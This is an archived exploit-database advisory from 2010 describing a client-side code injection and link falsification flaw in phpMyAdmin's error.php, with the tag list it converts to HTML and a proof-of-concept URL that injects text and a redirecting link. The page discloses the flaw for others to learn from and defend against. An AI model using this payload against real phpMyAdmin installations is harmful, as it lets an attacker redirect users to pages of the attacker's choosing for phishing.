Home / os / win7

[webapps / 0day] - PhpMyAdmin Client Side 0Day Code Injectio

Posted on 06 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>PhpMyAdmin Client Side 0Day Code Injection and Link Falsification | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='PhpMyAdmin Client Side 0Day Code Injection and Link Falsification by emgent in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=================================================================
PhpMyAdmin Client Side 0Day Code Injection and Link Falsification
=================================================================

Credits:
  Emanuele &#039;emgent&#039; Gentili   &lt;emgent@backtrack-linux.org&gt;
  Marco &#039;white_sheep&#039; Rondini &lt;white_sheep@backtrack-linux.org&gt;
  Alessandro &#039;scox&#039; Scoscia   &lt;scox@backtrack.it&gt;
 
 
In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode.
With tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users.
Available tags are:
 
 
      &#039;[i]&#039;       =&gt; &#039;&lt;em&gt;&#039;,     
      &#039;[/i]&#039;      =&gt; &#039;&lt;/em&gt;&#039;,    
      &#039;[em]&#039;      =&gt; &#039;&lt;em&gt;&#039;,
      &#039;[/em]&#039;     =&gt; &#039;&lt;/em&gt;&#039;,
      &#039;[b]&#039;       =&gt; &#039;&lt;strong&gt;&#039;, 
      &#039;[/b]&#039;      =&gt; &#039;&lt;/strong&gt;&#039;,
      &#039;[strong]&#039;  =&gt; &#039;&lt;strong&gt;&#039;,
      &#039;[/strong]&#039; =&gt; &#039;&lt;/strong&gt;&#039;,
      &#039;[tt]&#039;      =&gt; &#039;&lt;code&gt;&#039;,   
      &#039;[/tt]&#039;     =&gt; &#039;&lt;/code&gt;&#039;,  
      &#039;[code]&#039;    =&gt; &#039;&lt;code&gt;&#039;,
      &#039;[/code]&#039;   =&gt; &#039;&lt;/code&gt;&#039;,
      &#039;[kbd]&#039;     =&gt; &#039;&lt;kbd&gt;&#039;,
      &#039;[/kbd]&#039;    =&gt; &#039;&lt;/kbd&gt;&#039;,
      &#039;[br]&#039;      =&gt; &#039;&lt;br /&gt;&#039;,
      &#039;[/a]&#039;      =&gt; &#039;&lt;/a&gt;&#039;,
      &#039;[sup]&#039;      =&gt; &#039;&lt;sup&gt;&#039;,
      &#039;[/sup]&#039;      =&gt; &#039;&lt;/sup&gt;&#039;,
 
      and replace &#039;/[a@([^&quot;@]*)@([^]&quot;]*)]/&#039; with &#039;&lt;a href=&quot;1&quot; target=&quot;2&quot;&gt;&#039;
 
 
POC:
 
http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&amp;error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-06]</pre></body></html>

 

TOP

Malware :

Exploits :